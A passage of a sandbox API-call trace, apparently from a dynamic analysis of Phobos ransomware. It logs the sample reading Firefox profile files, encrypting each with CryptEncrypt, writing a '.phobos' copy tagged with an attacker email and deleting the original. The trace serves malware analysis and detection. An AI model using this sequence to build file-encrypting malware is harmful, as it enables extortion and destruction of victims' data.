0xffffffff [0195.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.127] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.127] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0195.128] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.128] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10000, lpOverlapped=0x0) returned 1 [0195.130] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10010, dwBufLen=0x10010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10010) returned 1 [0195.130] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10010, lpOverlapped=0x0) returned 1 [0195.132] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.132] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.132] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.132] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.132] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.132] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.133] CloseHandle (hObject=0x180) returned 1 [0195.133] CloseHandle (hObject=0x134) returned 1 [0195.133] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db")) returned 1 [0195.134] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.135] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=206) returned 1 [0195.135] CloseHandle (hObject=0x134) returned 1 [0195.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini")) returned 0x2020 [0195.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.135] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.136] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.136] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0195.136] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.136] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce, lpOverlapped=0x0) returned 1 [0195.137] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0195.137] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0195.138] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.138] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.138] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.138] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.138] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.139] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.139] CloseHandle (hObject=0x134) returned 1 [0195.139] CloseHandle (hObject=0x180) returned 1 [0195.139] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini")) returned 1 [0195.140] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.141] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=141) returned 1 [0195.141] CloseHandle (hObject=0x180) returned 1 [0195.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini")) returned 0x2020 [0195.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.142] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.142] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.143] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0195.143] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.143] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8d, lpOverlapped=0x0) returned 1 [0195.144] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x90, dwBufLen=0x90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x90) returned 1 [0195.144] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x90, lpOverlapped=0x0) returned 1 [0195.145] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.145] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.145] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.145] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.145] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.145] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.145] CloseHandle (hObject=0x180) returned 1 [0195.145] CloseHandle (hObject=0x134) returned 1 [0195.145] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini")) returned 1 [0195.146] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.147] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16384) returned 1 [0195.147] CloseHandle (hObject=0x134) returned 1 [0195.147] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db")) returned 0x2020 [0195.147] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.147] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.147] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0195.148] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.148] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4000, lpOverlapped=0x0) returned 1 [0195.150] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010, dwBufLen=0x4010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010) returned 1 [0195.150] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4010, lpOverlapped=0x0) returned 1 [0195.151] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.151] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.151] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0195.151] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.151] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe2, lpOverlapped=0x0) returned 1 [0195.151] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.151] CloseHandle (hObject=0x134) returned 1 [0195.151] CloseHandle (hObject=0x180) returned 1 [0195.152] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db")) returned 1 [0195.153] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.154] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1281) returned 1 [0195.154] CloseHandle (hObject=0x180) returned 1 [0195.154] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf")) returned 0x2020 [0195.154] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.155] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.155] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.155] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d28) returned 1 [0195.155] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.155] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x501, lpOverlapped=0x0) returned 1 [0195.254] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x510, dwBufLen=0x510 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x510) returned 1 [0195.254] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x510, lpOverlapped=0x0) returned 1 [0195.255] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.255] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.255] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.255] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.255] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.255] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.255] CloseHandle (hObject=0x180) returned 1 [0195.255] CloseHandle (hObject=0x134) returned 1 [0195.262] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf")) returned 1 [0195.262] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.264] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3827) returned 1 [0195.264] CloseHandle (hObject=0x134) returned 1 [0195.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf")) returned 0x2020 [0195.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 